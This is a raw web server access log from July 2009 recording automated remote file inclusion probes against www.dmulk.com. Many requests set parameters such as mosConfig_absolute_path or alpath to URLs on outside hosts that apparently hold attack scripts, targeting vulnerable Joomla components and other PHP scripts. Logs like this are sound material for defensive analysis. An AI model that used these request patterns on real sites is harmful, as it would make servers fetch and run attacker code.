211.43.202.66 - - [26/Jul/2009:09:41:23 -0700] "GET /logs/access_080911.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:41:23 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:41:24 -0700] "GET /logs/access_080519.log//include/mail.inc.php?skin_board_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:41:24 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:41:25 -0700] "GET /logs/access_080911.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:41:25 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:41:28 -0700] "GET /logs/access_090206.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:41:29 -0700] "GET /logs/access_090206.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:41:29 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:41:29 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:41:29 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:41:29 -0700] "GET /logs/access_080911.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:41:31 -0700] "GET /logs/access_080911.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:41:31 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:41:32 -0700] "GET /logs/access_090206.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:41:36 -0700] "GET /logs/access_090206.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:41:39 -0700] "GET /logs/access_090206.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:09:41:52 -0700] "GET /logs/access_080924.log%20%20//?_zb_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:54 -0700] "GET /logs/access_080314.log//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:54 -0700] "GET /al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:54 -0700] "GET /logs/access_080314.log//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:54 -0700] "GET /logs//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:54 -0700] "GET /al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:54 -0700] "GET /logs//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:41:55 -0700] "GET /logs/access_071228.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:41:55 -0700] "GET /logs/access_080114.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:09:41:55 -0700] "GET /logs/access_081009.log//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:59 -0700] "GET /logs/access_080314.log//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:59 -0700] "GET /logs//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:59 -0700] "GET /al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:59 -0700] "GET /al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:59 -0700] "GET /logs/access_080314.log//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:41:59 -0700] "GET /logs//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:03 -0700] "GET /logs/access_080228.log//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:07 -0700] "GET /logs/access_080228.log//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:09 -0700] "GET /al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:09 -0700] "GET /logs//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:09 -0700] "GET /logs/access_080314.log//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:10 -0700] "GET /al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:10 -0700] "GET /logs/access_080314.log//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:10 -0700] "GET /logs//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:27 -0700] "GET /logs/access_090718.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:27 -0700] "GET /logs/access_080911.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:27 -0700] "GET /logs/access_090718.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:27 -0700] "GET /logs/access_080911.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:38 -0700] "GET /al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:38 -0700] "GET /logs//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:38 -0700] "GET /logs/access_080314.log%20%20//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:38 -0700] "GET /al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:38 -0700] "GET /logs//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:42:38 -0700] "GET /logs/access_080314.log%20%20//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:42:40 -0700] "GET /logs/access_080906.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:42:40 -0700] "GET /logs/access_090426.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:42 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:42 -0700] "GET /logs/access_080307.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:42 -0700] "GET /logs/access_090201.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:42:46 -0700] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:42:46 -0700] "GET /logs/access_080107.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:42:46 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:42:52 -0700] "GET //components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:42:52 -0700] "GET /logs///components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:42:52 -0700] "GET /logs/access_080107.log///components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:54 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:54 -0700] "GET /logs/access_090201.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:54 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:54 -0700] "GET /logs/access_080307.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:56 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:56 -0700] "GET /logs/access_080307.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:42:56 -0700] "GET /logs/access_090201.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:43:02 -0700] "GET /logs/access_071228.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:43:06 -0700] "GET /logs/access_080718.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:43:14 -0700] "GET /logs/access_080307.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:43:14 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:43:14 -0700] "GET /logs/access_090201.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:43:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:43:14 -0700] "GET /logs/access_080228.log%20%20//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:43:14 -0700] "GET /logs/access_080911.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:43:16 -0700] "GET /logs/access_080228.log%20%20//al_initialize.php?alpath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:43:16 -0700] "GET /logs/access_090206.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:43:24 -0700] "GET /logs/access_090718.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:43:24 -0700] "GET /logs/access_080911.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:44:14 -0700] "GET /logs/access_090106.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:45:07 -0700] "GET /logs/access_090718.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:45:07 -0700] "GET /logs/access_080410.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:45:16 -0700] "GET /logs/access_081026.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:45:16 -0700] "GET /logs/access_080911.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:45:19 -0700] "GET /logs/access_090206.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.45.45 - - [26/Jul/2009:09:45:22 -0700] "GET /logs/access_090119.log/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.45.45 - - [26/Jul/2009:09:45:22 -0700] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.45.45 - - [26/Jul/2009:09:45:22 -0700] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:45:26 -0700] "GET /logs/access_080519.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:45:27 -0700] "GET /logs/access_090718.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:45:27 -0700] "GET /logs/access_080410.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:45:30 -0700] "GET /logs/access_080114.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:45:36 -0700] "GET /logs/access_090718.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:45:36 -0700] "GET /logs/access_080410.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:45:47 -0700] "GET /logs/access_080106.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [26/Jul/2009:09:45:49 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:46:15 -0700] "GET /logs//votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:46:15 -0700] "GET /votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:46:15 -0700] "GET /logs/access_090221.log//votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:46:19 -0700] "GET /votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:46:19 -0700] "GET /logs/access_090221.log//votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:46:19 -0700] "GET /logs//votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
